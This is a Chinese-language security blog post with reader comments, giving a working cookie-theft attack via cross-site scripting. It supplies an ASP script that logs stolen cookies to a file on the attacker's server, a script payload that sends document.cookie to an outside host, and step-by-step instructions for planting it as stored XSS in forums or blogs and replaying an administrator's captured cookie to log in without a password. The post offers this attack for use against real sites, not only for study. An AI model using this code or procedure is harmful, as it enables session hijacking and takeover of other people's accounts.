XSS获取cookie并利用

2012-11-12 983172人围观 ,发现 24 个不明物体 WEB安全

获取cookie利用代码cookie.asp

<html>
<title>xx</title>
<body>
<%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值
set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie
thisfile.close()   //关闭
set fs = nothing%>
</body>
</html>

把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。

XSS构造语句

<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>

把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg=’+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。

简单步骤如下:

1、在存在漏洞的论坛中发日志:

2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:

3、这是没有账户前的登陆界面:

4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:

5、替换cookie后不用输用户名密码就顺利进入管理员账户了:


[ by xfk ]

这些评论亮了

  • zero 回复
    1 博客里的文章要使用ARP欺骗,但很多电脑多有[数字]软件,所以成功概率很低。
    2 既然是工作环境的IP,一定要打马赛克,不然你会有犯大错的时候。
    3 ??76同学,要低调,才能踏实工作。
    )27( 亮了
  • xfk (3级) 绿盟安全工程师 回复
    @litdg  呵呵,先学走在学跑嘛,一步一步来,慢慢捉摸捣腾。
    )9( 亮了
  • litdg (6级) FB作者 回复
    对学习基础很有啊,像我这么菜的人还是很喜欢这种类型文章的。感谢分享。
    )7( 亮了
发表评论

已有 23 条评论

取消
Loading...
css.php